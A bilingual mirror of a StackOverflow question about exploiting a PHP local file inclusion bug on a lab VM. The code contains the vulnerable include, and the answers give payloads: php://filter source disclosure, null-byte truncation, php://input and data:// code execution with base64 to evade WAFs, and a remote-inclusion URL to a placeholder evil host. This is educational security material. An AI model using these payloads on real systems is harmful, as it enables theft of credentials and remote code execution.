PHP 安全漏洞 - 列出远程 PHP 文件的内容?
声明:本页面是StackOverFlow热门问题的中英对照翻译,遵循CC BY-SA 4.0协议,如果您需要使用它,必须同样遵循CC BY-SA许可,注明原文地址和作者信息,同时你必须将它归于原作者(不是我):StackOverFlow
原文地址: http://stackoverflow.com/questions/20726247/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me):
StackOverFlow
PHP security exploit - list content of remote PHP file?
提问by swiftcode
I'm trying to exploit some web vulnerabilities in a sample website running inside a VM (it is not available on the web - only for educational purposes). I have a php file named setupreset.phpwhich has the information about MySQL configs, setup and passwords used to setup the website. This is in the same directory as the rest of the php files (index, products, forum, etc...).
我正在尝试利用在 VM 内运行的示例网站中的一些网络漏洞(它在网络上不可用 - 仅用于教育目的)。我有一个名为的 php 文件setupreset.php,其中包含有关用于设置网站的 MySQL 配置、设置和密码的信息。它与其余的 php 文件(索引、产品、论坛等)位于同一目录中。
This is the code of index.php, for reference:
这是index.php的代码,供参考:
<?php
include ("includes/header.php");
// Grab inputs
$page = $_GET[page];
if ($page=="") {
include("home.html");
} else { include ($page . '.php'); }
include ("includes/footer.php");
?>
The main goal is to list the contents of the setupresetPHP file, or download it somehow. If I navigate to this file: http://10.211.55.5/index.php?page=setupreset, it gets executed, but the PHP code is naturally not shown, due to the fact that it is parsed by the PHP interpreter.
主要目标是列出setupresetPHP 文件的内容,或以某种方式下载它。如果我导航到这个文件: http://10.211.55.5/index.php?page=setupreset,它会被执行,但 PHP 代码自然不会显示,因为它是由 PHP 解释器解析的。
Now, the website uses PHP includes, so URLs look like this: http://10.211.55.5/index.php?page=products. This seems like it's vulnerable to remote file inclusion, where I could simply point to another PHP page, e.g. http://10.211.55.5/index.php?page=http://badwebsite.com/myevilscript.phpbut allow_url_includeis offand cannot be changed, so this won't work (I tried this). However, allow_url_fopenis likely on (since it's on by default), so my question is the following: is it possible to upload a PHP file or some script that lists the content of setupreset.phpusing this kind of exploit?
现在,该网站使用 PHP include,因此 URL 如下所示:http://10.211.55.5/index.php?page=products. 这似乎是很容易受到远程文件包含,在那里我可以简单地指向另一个PHP页面,如http://10.211.55.5/index.php?page=http://badwebsite.com/myevilscript.php但allow_url_include是off,不能改变的,所以这是不行的(这个我试过)。但是,allow_url_fopen可能已启用(因为默认情况下它已启用),所以我的问题如下:是否可以上传 PHP 文件或某些列出setupreset.php使用此类漏洞利用的内容的脚本?
回答by CodeColorist
If allow_url_includeis off, you can't execute remote code. But you can find other pages, for example a content management dashboard, to upload your code as "image", then find the actual path and includeit.
如果allow_url_include关闭,则无法执行远程代码。但是您可以找到其他页面,例如内容管理仪表板,将您的代码上传为“图像”,然后找到实际路径和include它。
And, there are still ways to exploit.
而且,仍然有方法可以利用。
Let's look inside your code. You may notice that it automatically add an extension .phpat the end of path. So you should remove phpin GET param. But what if the file you want to include does not have PHP extension? Then use %00to terminate string, such as
让我们看看你的代码。您可能会注意到它会自动.php在路径末尾添加扩展名。所以你应该php在 GET 参数中删除。但是如果您要包含的文件没有 PHP 扩展名怎么办?然后用于%00终止字符串,如
http://localhost/include.php?page=../uploads/your_uploaded_fake_image.jpg%00
There's a special protocol in PHP, powerful and dangerous. It's php://.
You can check out the offcial manualfor detailed information, and here I'll show you some cases to make a file inclusion vulnerability become source disclosure and even remote code execution vulnerabilities.
PHP 中有一个特殊的协议,强大而危险。它是php://。详细信息可以查看官方手册,这里我将向您展示一些案例,使文件包含漏洞成为源代码泄露甚至远程代码执行漏洞。
Before your test, I suggest you use Firefoxwith HackBarplugin. It's a powerful penetration testing suite.
在测试之前,我建议您使用带有HackBar插件的Firefox。这是一个强大的渗透测试套件。
- Source disclosure
- 来源披露
This feature doesn't need url inclusion allowed.
此功能不需要允许包含 url。
php://filteris a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read. (Reference)
php://filter是一种元包装器,旨在允许在打开时将过滤器应用于流。这对于多合一文件函数非常有用,例如 readfile()、file() 和 file_get_contents(),否则在读取内容之前没有机会对流应用过滤器。(参考)
Then you can see the source secret.inc.phpin the same directory via following request.
然后您可以secret.inc.php通过以下请求在同一目录中查看源。
http://localhost/include.php?page=php://filter/read=convert.base64-encode/resource=secret.inc
File content will be encoded in base64, so it does support binary file.
文件内容将采用 base64 编码,因此它确实支持二进制文件。
It's powerfulto get sensitive information, such as database passwords or a encryption key! If privilege is not proper configurated, it can even jump out of cage and extract data from files in outter directories, like /etc/passwd!
获取敏感信息(例如数据库密码或加密密钥)非常强大!如果权限配置不当,它甚至可以跳出笼子,从外部目录中的文件中提取数据,例如/etc/passwd!
- Remote code execution
- 远程代码执行
Actually you can't exploit this way, because allow_url_includeis Off in this case.
实际上你不能以这种方式利用,因为allow_url_include在这种情况下是关闭的。
But I must point it out because it's magical!
但我必须指出,因为它很神奇!
It's completly different from local include. It doesn't need to upload any file to a remote server or so. All you need is one single request.
它与本地包含完全不同。它不需要将任何文件上传到远程服务器左右。您只需要一个请求即可。
php://inputcan access the raw HTTP request body, so what does include("php://input")do? Just visit http://localhost/include.php?page=php://input, with valid PHP code in request body, then you can execute any (allowed) function in remote server!
php://input可以访问原始的 HTTP 请求正文,那么有什么作用include("php://input")呢?只需访问http://localhost/include.php?page=php://input,在请求正文中使用有效的 PHP 代码,然后您就可以在远程服务器中执行任何(允许的)功能!
Don't forget the %00to drop .phptail.
不要忘记%00掉.php尾。
Besides, PHP supports data://URL scheme. You can directly put code in GET param! The following test doesn't need any special tool, just a normal browser can execute an attack.
此外,PHP 支持data://URL 方案。可以直接在GET参数中放入代码!下面的测试不需要任何特殊工具,普通浏览器就可以执行攻击。
http://localhost/include.php?page=data:text/plaintext,<?php phpinfo();?>
Some Web Application Firewalls may detect suspected string in URL and block evil request, they won't leave the phpinfoalone. Is there a way to encrypt? Of course. data://URL supports at least base64 encoding...
一些 Web 应用防火墙可能会检测到 URL 中的可疑字符串并阻止恶意请求,它们不会phpinfo单独存在。有没有办法加密?当然。data://URL 至少支持 base64 编码...
http://localhost/include.php?page=data:text/plain;base64, PD9waHAgcGhwaW5mbygpOyA/Pg==
And you will get familiar phpinfo once again!
您将再次获得熟悉的phpinfo!
Note
笔记
The null byte trick (%00) does not work anymore for PHP >= 5.3.4: http://blog.benjaminwalters.net/?p=22139
空字节技巧 ( %00) 不再适用于 PHP >= 5.3.4:http: //blog.benjaminwalters.net/?p=22139
回答by nietonfir
Use a directory traversal and end your input string with a %00NUL meta character(as mentioned on wikipedia).
使用目录遍历并以%00NUL 元字符结束输入字符串(如wikipedia 所述)。
http://example.com/index.php?page=setuppreset%00
This will remove the ".php" suffix from the inclusion and might help you somehow.
这将从包含中删除“.php”后缀,并可能以某种方式帮助您。
回答by Evert
It is not. The php file is getting executed because you call include, if you called readfile, file_get_contentsor similar you could see the contents of the php file.
它不是。php 文件正在执行,因为您调用了include,如果您调用了readfile,file_get_contents或者类似的,您可以看到 php 文件的内容。
